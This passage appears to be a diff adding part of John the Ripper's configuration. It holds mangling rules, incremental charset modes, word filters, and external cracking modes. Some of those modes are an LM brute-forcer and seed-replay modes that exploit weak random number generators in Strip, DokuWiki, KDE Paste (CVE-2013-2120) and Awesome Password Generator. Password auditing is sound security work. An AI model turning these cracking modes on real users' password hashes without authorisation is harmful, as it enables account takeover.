+->4 a0 W3QW[z0]W[z1]W[z2]
+->5 a0 W4QW[z0]W[z1]W[z2]W[z3]
+->6 a0 W5QW[z0]W[z1]W[z2]W[z3]W[z4]
+->7 a0 W6QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]
+->8 a0 W7QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]
+->9 a0 W8QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]
+->A a0 W9QW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]
+->B a0 WAQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]
+->C a0 WBQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]
+->D a0 WCQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]
+->E a0 WDQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]
+->F a0 WEQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]
+->G a0 WFQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]W[zE]
+
+# Used for loopback. This rule will produce candidates "PASSWOR" and "D" for
+# an input of "PASSWORD" (assuming LM, which has halves of length 7).
+[List.Rules:Split]
+:
+-s x**
+
+# Some Office <=2003 files have passwords truncated at 15
+[List.Rules:OldOffice]
+:
+->F -<F >F 'F
+
+# Rules from Hash Runner 2014
+[List.Rules:o1]
+# o[0-9A-Z][ -~]
+->\r[1-9A-ZZ] >\p[0-9A-Z] o\0[ -~] Q
+
+[List.Rules:o2]
+# o[0-9A-E][ -~] Q M o[0-9A-E][ -~] Q
+->[1-9A-F] ->[1-9A-F] >\p1[0-9A-E] >\p2[0-9A-E] o\3[ -~] Q M o\4[ -~] Q
+
+[List.Rules:o3]
+# o[0-9][ -~] Q M o[0-9][ -~] Q M o[0-9][ -~] Q
+->[1-9A] ->[1-9A] ->[1-9A] >\p1[0-9] >\p2[0-9] >\p3[0-9] o\4[ -~] Q M o\5[ -~] Q M o\6[ -~] Q
+
+[List.Rules:o]
+.include [List.Rules:o1]
+.include [List.Rules:o2]
+
+[List.Rules:i1]
+# i[0-9A-Z][ -~]
+->\r[2-9A-ZZZ] >\p1[0-9A-Z] i\0[ -~]
+
+[List.Rules:i2]
+# i[0-9A-E][ -~] i[0-9A-E][ -~]
+->[2-9A-G] ->[2-9A-G] >\p1[0-9A-E] >\p2[0-9A-E] i\3[ -~] i\4[ -~]
+
+[List.Rules:i3]
+# i[0-9][ -~] i[0-9][ -~] i[0-9][ -~]
+->[4-9A-D] ->[4-9A-D] ->[4-9A-D] >\p1[0-9] >\p2[0-9] >\p3[0-9] i\4[ -~] i\5[ -~] i\6[ -~]
+
+[List.Rules:i]
+.include [List.Rules:i1]
+.include [List.Rules:i2]
+
+[List.Rules:oi]
+.include [List.Rules:o1]
+.include [List.Rules:i1]
+.include [List.Rules:o2]
+.include [List.Rules:i2]
+
+[List.Rules:T9]
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 s?D*
+a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7 ss7 st8 su8 sv8 sw9 sx9 sy9 sz9 /?D s?D#
+
+# A few rule sets from hashcat (taken as-is from https://github.com/hashcat/)
+#
+# Note that these are very poorly optimized with our measure, as they lack
+# rule-rejection flags. Also, they don't use the preprocessor so are a lot
+# harder to digest (for a human looking at them that is, for JtR there's
+# virtually no difference).
+#
+[List.Rules:best64]
+!! hashcat logic ON
+.include <rules/best64.rule>
+!! hashcat logic OFF
+
+[List.Rules:d3ad0ne]
+!! hashcat logic ON
+.include <rules/d3ad0ne.rule>
+!! hashcat logic OFF
+
+[List.Rules:dive]
+!! hashcat logic ON
+.include <rules/dive.rule>
+!! hashcat logic OFF
+
+[List.Rules:InsidePro]
+!! hashcat logic ON
+.include <rules/InsidePro-PasswordsPro.rule>
+!! hashcat logic OFF
+
+[List.Rules:T0XlC]
+!! hashcat logic ON
+.include <rules/T0XlC.rule>
+.include <rules/T0XlCv1.rule>
+.include <rules/T0XlC-insert_top_100_passwords_1_G.rule>
+!! hashcat logic OFF
+
+[List.Rules:rockyou-30000]
+!! hashcat logic ON
+.include <rules/rockyou-30000.rule>
+!! hashcat logic OFF
+
+[List.Rules:specific]
+!! hashcat logic ON
+.include <rules/specific.rule>
+!! hashcat logic OFF
+
+[List.Rules:hashcat]
+.include [List.Rules:best64]
+.include [List.Rules:d3ad0ne]
+.include [List.Rules:dive]
+.include [List.Rules:InsidePro]
+.include [List.Rules:T0XlC]
+.include [List.Rules:rockyou-30000]
+.include [List.Rules:specific]
+
+# These are for phrase wordlists w/ spaces
+[List.Rules:passphrase-rule1]
+.include <rules/passphrase-rule1.rule>
+
+[List.Rules:passphrase-rule2]
+.include <rules/passphrase-rule2.rule>
+
+# Default Loopback mode rules.
+[List.Rules:Loopback]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:Split]
+!! hashcat logic ON
+m
+-m
+!! hashcat logic OFF
+b1 ]
+
+# For Single Mode against fast hashes
+[List.Rules:Single-Extra]
+.include [List.Rules:Single]
+.include [List.Rules:Extra]
+.include [List.Rules:OldOffice]
+
+# For Wordlist mode and very fast hashes
+[List.Rules:Jumbo]
+.include [List.Rules:Single-Extra]
+.include [List.Rules:Wordlist]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:best64]
+
+# KoreLogic rules
+.include <korelogic.conf>
+
+# Everything, including all KoreLogic and the rest of included hashcat rules.
+# Only for very fast hashes and/or Single mode. Some of these rules are of
+# ridiculous quality and lack optimizations - you have been warned.
+[List.Rules:All]
+.include [List.Rules:Jumbo]
+.include [List.Rules:KoreLogic]
+.include [List.Rules:T9]
+.include [List.Rules:hashcat]
+
+# Incremental modes
+
+# This is for one-off uses (make your own custom.chr)
+[Incremental:Custom]
+File = $JOHN/custom.chr
+MinLen = 0
+
+# The theoretical CharCount is 211, we've got 196.
+[Incremental:UTF8]
+File = $JOHN/utf8.chr
+MinLen = 0
+CharCount = 196
+
+# This is CP1252, a super-set of ISO-8859-1.
+# The theoretical CharCount is 219, we've got 203.
+[Incremental:Latin1]
+File = $JOHN/latin1.chr
+MinLen = 0
+CharCount = 203
+
+[Incremental:ASCII]
+File = $JOHN/ascii.chr
+MinLen = 0
+MaxLen = 13
+CharCount = 95
+
+[Incremental:LM_ASCII]
+File = $JOHN/lm_ascii.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 69
+
+# This is CP858 (CP850 + Euro sign, superset of CP437).
+# The theoretical CharCount is 209 minus lowercase, we've got 132.
+[Incremental:LanMan]
+File = $JOHN/lanman.chr
+MinLen = 0
+MaxLen = 7
+CharCount = 132
+
+# This is alnum (upper & lower case) as well as space.
+[Incremental:Alnumspace]
+File = $JOHN/alnumspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 63
+
+[Incremental:Alnum]
+File = $JOHN/alnum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 62
+
+[Incremental:Alpha]
+File = $JOHN/alpha.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 52
+
+[Incremental:LowerNum]
+File = $JOHN/lowernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:UpperNum]
+File = $JOHN/uppernum.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 36
+
+[Incremental:LowerSpace]
+File = $JOHN/lowerspace.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 27
+
+[Incremental:Lower]
+File = $JOHN/lower.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Upper]
+File = $JOHN/upper.chr
+MinLen = 1
+MaxLen = 13
+CharCount = 26
+
+[Incremental:Digits]
+File = $JOHN/digits.chr
+MinLen = 1
+MaxLen = 20
+CharCount = 10
+
+# Some pre-defined word filters as used to generate the supplied .chr files
+[List.External:Filter_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 0x20 || c > 0x7e || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LanMan]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_LM_ASCII]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i]) {
+		if (c < 0x20 || c > 0x7e ||	// Require ASCII-only
+		    i >= 14) {			// of up to 14 characters long
+			word = 0; return;
+		}
+		if (c >= 'a' && c <= 'z')	// Convert to uppercase
+			word[i] &= 0xDF;
+		i++;
+	}
+
+	word[7] = 0;				// Truncate at 7 characters
+}
+
+[List.External:Filter_Alnumspace]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c != ' ' && (((c < '0' || c > '9') &&
+	((c &= 0xDF) < 'A' || c > 'Z'))) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alnum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < '0' || c > '9') && ((c &= 0xDF) < 'A' || c > 'Z')) ||
+	    i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Alpha]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c &= 0xDF) < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_UpperNum]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'A' || c > 'Z') && (c < '0' || c > '9')) || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_LowerSpace]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && c != ' ') || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Lower]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'a' || c > 'z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Upper]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Digits]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < '0' || c > '9' || i > 20) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_No_Cap_or_Symbols]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
+		return;
+	}
+	word = 0; return;
+}
+
+
+# Reject words that are illegal UTF-8
+# We obviously let pure ASCII through too
+[List.External:Filter_UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				word = 0; return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				word = 0; return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					word = 0; return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					word = 0; return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					word = 0; return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					word = 0; return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					word = 0; return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						word = 0; return;
+					}
+				}
+			}
+		}
+	}
+}
+
+# Reject words that are LEGAL UTF-8 (also rejects pure ASCII)
+[List.External:Filter_non-UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						return;
+					}
+				}
+			}
+		}
+	}
+	word = 0;
+}
+
+# A simple cracker for LM hashes
+[List.External:LanMan]
+int length;				// Current length
+int maxlength;
+
+void init()
+{
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	word[0] = 'A' - 1;		// Start with "A"
+	word[length] = 0;
+}
+
+void generate()
+{
+	int i;
+
+	i = length - 1;			// Start from the last character
+	while (++word[i] > 'Z')		// Try to increase it
+	if (i)				// Overflow here, any more positions?
+		word[i--] = 'A';	// Yes, move to the left, and repeat
+	else				// No
+
+	if (length < maxlength) {
+		word[i = ++length] = 0;	// Switch to the next length
+		while (i--)
+			word[i] = 'A';
+		return;
+	} else {
+		word = 0; return;	// We're done
+	}
+}
+
+void restore()
+{
+	length = 0;			// Calculate the length
+	while (word[length]) length++;
+}
+
+# Simple and well-commented, yet useful external mode example
+# NOTE, this has now been 'split' up into a base extern, 'base', and then
+# multiple External:double functions.  It still has same code as original
+# double, but now can be easily expanded.
+[List.External_base:Double]
+/*
+ * This cracking mode tries all the possible duplicated lowercase alphabetic
+ * "words" of up to 8 characters long.  Since word halves are the same, it
+ * only has to try about 500,000 words.
+ */
+
+/* Global variables: current length and word */
+/* make this 'long' enough for other externs that include this one */
+/* (up to 125 bytes long) */
+
+int length, current[126], max;
+
+/* this new 'type' variable, is used to tell double what character set to
+ * use. It can use the original (alpha).  If type is 0 (i.e. unset), then
+ * a-z (alpha) character set is used.  If type is '0' (a zero ascii byte)
+ * then alnum charset is used, a-z0-9.  If type is a space char, then all
+ * charset is used  [space - tilde]  or [ -~].  This required setting the
+ * type var in the init() of alnum or all doubles (it can be left unset
+ * in the alpha versions).  It also requires some if logic in generate.
+ * other than that, it works the same, with almost no performance hit */
+int type;
+
+/* Generates a new word */
+void generate()
+{
+	int i;
+
+/* Export last generated word, duplicating it at the same time; here "word"
+ * is a pre-defined external variable. */
+	word[(i = length) << 1] = 0;
+	while (i--) word[length + i] = word[i] = current[i];
+
+/* Generate a new word */
+	i = length - 1;			// Start from the last character
+	if (type == 0) {
+		/* alpha */
+		while (++current[i] > 'z')	// Try to increase it
+		if (i)				// Overflow here, any more positions?
+			current[i--] = 'a';	// Yes, move to the left, and repeat
+		else {				// No
+			current = 0;		// Request a length switch
+			break;			// Break out of the loop
+		}
+	} else if (type == '0') {
+		/* alnum */
+		if (current[i] == 'z') current[i] = '0'-1;
+		while (++current[i] == '9')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = 'a';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+			if (current[i] == 'z') current[i] = '0'-1;
+		}
+	} else if (type == ' ') {
+		/* all */
+		while (++current[i] > '~')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = ' ';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+		}
+	}
+	/* else ????? wtf?? */
+
+/* Switch to the next length, unless we were generating 8 character long
+ * words already. */
+	if (!current && length < max) {
+		i = ++length;
+		if (type == 0 || type == '0')
+			while (i--) current[i] = 'a';
+		else if (type == ' ')
+			while (i--) current[i] = ' ';
+	}
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+/* Import the word back */
+	i = 0;
+	while (current[i] = word[i]) i++;
+
+/* ...and calculate the half-word length */
+	length = i >> 1;
+}
+
+[List.External:Double]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+}
+
+[List.External:Double_alnum]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = '0';
+}
+
+[List.External:Double_all]
+.include [List.External_base:Double]
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = ' ';	// Set our half-word to "  "
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = ' ';
+}
+
+
+# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
+# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
+# crack passwords you may have generated with Strip; other uses of Strip
+# are unaffected.
+[List.External:Strip]
+int minlength, maxlength, mintype, maxtype;
+int crack_seed, length, type;
+int count, charset[128];
+
+void init()
+{
+	int c;
+
+/* Password lengths to try; Strip can generate passwords of 4 to 16
+ * characters, but traditional crypt(3) hashes are limited to 8. */
+	minlength = req_minlen;
+	if (minlength < 4)
+		minlength = 4;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	if (maxlength >16) maxlength = 16;
+
+/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
+	mintype = 0;	// 0
+	maxtype = 2;	// 2
+
+	crack_seed = 0x10000;
+	length = minlength - 1;
+	type = mintype;
+
+	count = 0;
+	c = '0'; while (c <= '9') charset[count++] = c++;
+}
+
+void generate()
+{
+	int seed, random;
+	int i, c;
+
+	if (crack_seed > 0xffff) {
+		crack_seed = 0;
+
+		if (++length > maxlength) {
+			length = minlength;
+
+			if (++type > maxtype) {
+				word[0] = 0;
+				return;
+			}
+		}
+
+		count = 10;
+		if (type >= 1) {
+			c = 'a'; while (c <= 'f') charset[count++] = c++;
+			c = 'h'; while (c <= 'z') charset[count++] = c++;
+			c = 'A'; while (c <= 'Z') charset[count++] = c++;
+		}
+		if (type == 2) {
+			charset[count++] = '!';
+			c = '#'; while (c <= '&') charset[count++] = c++;
+			c = '('; while (c <= '/') charset[count++] = c++;
+			c = '<'; while (c <= '>') charset[count++] = c++;
+			charset[count++] = '?'; charset[count++] = '@';
+			charset[count++] = '['; charset[count++] = ']';
+			charset[count++] = '^'; charset[count++] = '_';
+			c = '{'; while (c <= '~') charset[count++] = c++;
+		}
+	}
+
+	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
+
+	i = 0;
+	while (i < length) {
+		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
+		word[i++] = charset[random % count];
+	}
+
+	word[i] = 0;
+}
+
+# A variation of KnownForce configured to try all the 385641000 possible
+# auto-generated passwords of DokuWiki versions up to at least 2013-05-10.
+[List.External:DokuWiki]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int A[26], C[26], V[26];
+	int length;
+	int pos, ofs, i, c;
+
+	i = 0; while (i < 26) { A[i] = C[i] = 1; V[i++] = 0; }
+	i = 'a' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'e' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'i' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'o' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'u' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'q' - 'a'; A[i] = C[i] = 0;
+	i = 'x' - 'a'; A[i] = C[i] = 0;
+	i = 'y' - 'a'; A[i] = C[i] = 0;
+
+	length = 8;
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (C[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (V[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (A[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+	}
+	c = '1';
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+		c = '0';
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+/*
+ * This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet
+ * uses to generate passwords.
+ *
+ * This software is Copyright (c) Michael Samuel <mik@miknet.net>,
+ * and it is hereby released to the general public under the following terms:
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted.
+ */
+[List.External:KDEPaste]
+int charset[95];
+int charset_length, password_length, endTime, startTime, msec;
+
+void init()
+{
+	password_length = 8;	/* Change this to match config */
+	endTime = session_start_time;
+	startTime = 1343743200;	/* Aug 1 2012  - Change this as necessary */
+
+	msec = 1;		/* msec is never 0 - it would crash the applet */
+
+	charset_length = 0;
+	int c;
+
+	/* Comment out classes that you don't need, but keep the order the same */
+	/* Lowers */
+	c = 'a'; while (c <= 'z') charset[charset_length++] = c++;
+
+	/* Uppers */
+	c = 'A'; while (c <= 'Z') charset[charset_length++] = c++;
+
+	/* Numbers */
+	c = '0'; while (c <= '9') charset[charset_length++] = c++;
+	charset[charset_length++] = '0';	/* Yep, it's there twice */
+
+	/* Symbols */
+	c = '!'; while (c <= '/') charset[charset_length++] = c++;
+	c = ':'; while (c <= '@') charset[charset_length++] = c++;
+	c = '['; while (c <= '`') charset[charset_length++] = c++;
+	c = '{'; while (c <= '~') charset[charset_length++] = c++;
+}
+
+void generate()
+{
+	int i, rand_seed, rand_result;
+
+	/* Terminate once we've generated for all *
+	 * of the time range (Plus a bit more...) */
+	if (endTime + 1000 < startTime) {
+		word = 0;
+		return;
+	}
+
+	/* Skip msecs that would generate dupes */
+	while (endTime % msec != 0) {
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+
+	rand_seed = endTime / msec;
+
+	i = 0;
+	while (i < password_length) {
+		/* this works like rand_r() from eglibc */
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result = (rand_seed >> 16) & 2047;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		word[i++] = charset[rand_result % charset_length];
+	}
+	word[i] = 0;
+
+	if (++msec > 999) {
+		endTime--;
+		msec = 1;
+	}
+}
+
+void restore()
+{
+	int i, rand_seed, rand_result;
+
+	i = 0;
+
+	/* Very crude restore, just dry-run until we hit last word */
+	while (i != password_length) {
+
+		while (endTime % msec != 0) {
+			if (++msec > 999) {
+				endTime--;
+				msec = 1;
+			}
+		}
+
+		rand_seed = endTime / msec;
+
+		i = 0;
+		while (i < password_length) {
+			/* this works like rand_r() from eglibc */
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result = (rand_seed >> 16) & 2047;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			if (charset[rand_result % charset_length] != word[i++])
+				break;
+		}
+
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+}
+
+/* Awesome Password Generator RNG replay
+ * Written by Michael Samuel <mik@miknet.net>
+ * Public Domain.
+ *
+ * This takes advantage of a subtle bug, where a crypto RNG is used to
+ * seed the C# System.Random() class, which takes a 32-bit input, but
+ * converts negative numbers into non-negative numbers, resulting in
+ * only 31 bits of security.
+ *
+ * This only implements "easy to type" being *unticked*, and numbers,
+ * lowers, uppers and symbols being ticked, in random password mode.
+ * Changing the password length is easy, anything else is left as an
+ * exercise to the reader.
+ *
+ * Running Awesome Password Generator (1.3.2 or lower) in Mono is still
+ * vulnerable, but uses a different RNG, so this mode isn't compatible.
+ */
+
+/* Awesome Password Generator 1.3.2 does a two-pass run, selecting which
+ * charset each position will have, then picking the character.  This
+ * leads to heavy bias, and is fixed in 1.4.0 (along with many other
+ * fixes).  If you have been using Awesome Password Generator, you should
+ * upgrade immediately and change your passwords.
+ */
+[List.External:AwesomePasswordGenerator]
+int numbers[10];
+int lowers[26];
+int uppers[26];
+int symbols[32];
+
+/* Since we don't have a double datatype, I simply pre-calculated the
+ * transition numbers calculating the scale formula:
+ * (double)randNum * 4.656612873077393e-10 * {4/10/26/32}
+ */
+int boundaries_charclass[4];
+int boundaries_numbers[10];
+int boundaries_letters[26];
+int boundaries_symbols[32];
+
+/* This is the bug we're exploiting - the seed for the RNG is 32 bits
+ * from the crypto rng.  The non-crypto RNG converts negative numbers
+ * into non-negative numbers, so there's only 2^31 possible seeds.
+ */
+int seed;
+
+int password_length;
+
+void init()
+{
+	password_length = 16; /* Change this to match config */
+
+	int c, i;
+
+	c = '0'; i = 0; while (c <= '9') numbers[i++] = c++;
+	c = 'a'; i = 0; while (c <= 'z') lowers[i++] = c++;
+	c = 'A'; i = 0; while (c <= 'Z') uppers[i++] = c++;
+
+	/* Symbols */
+	i = 0;
+	symbols[i++] = '!'; symbols[i++] = '@'; symbols[i++] = '#'; symbols[i++] = '$';
+	symbols[i++] = '%'; symbols[i++] = '^'; symbols[i++] = '&'; symbols[i++] = '*';
+	symbols[i++] = '('; symbols[i++] = ')'; symbols[i++] = '~'; symbols[i++] = '-';
+	symbols[i++] = '_'; symbols[i++] = '='; symbols[i++] = '+'; symbols[i++] = '\\';
+	symbols[i++] = '|'; symbols[i++] = '/'; symbols[i++] = '['; symbols[i++] = ']';
+	symbols[i++] = '{'; symbols[i++] = '}'; symbols[i++] = ';'; symbols[i++] = ':';
+	symbols[i++] = '`'; symbols[i++] = '\''; symbols[i++] = '"'; symbols[i++] = ',';
+	symbols[i++] = '.'; symbols[i++] = '<'; symbols[i++] = '>'; symbols[i++] = '?';
+
+	i = 0;
+	boundaries_charclass[i++] = 536870912; boundaries_charclass[i++] = 1073741824;
+	boundaries_charclass[i++] = 1610612736; boundaries_charclass[i++] = 2147483647;
+
+	i = 0;
+	boundaries_numbers[i++] = 214748365; boundaries_numbers[i++] = 429496730;
+	boundaries_numbers[i++] = 644245095; boundaries_numbers[i++] = 858993460;
+	boundaries_numbers[i++] = 1073741824; boundaries_numbers[i++] = 1288490189;
+	boundaries_numbers[i++] = 1503238554; boundaries_numbers[i++] = 1717986919;
+	boundaries_numbers[i++] = 1932735284; boundaries_numbers[i++] = 2147483647;
+
+	i = 0;
+	boundaries_letters[i++] = 82595525; boundaries_letters[i++] = 165191050;
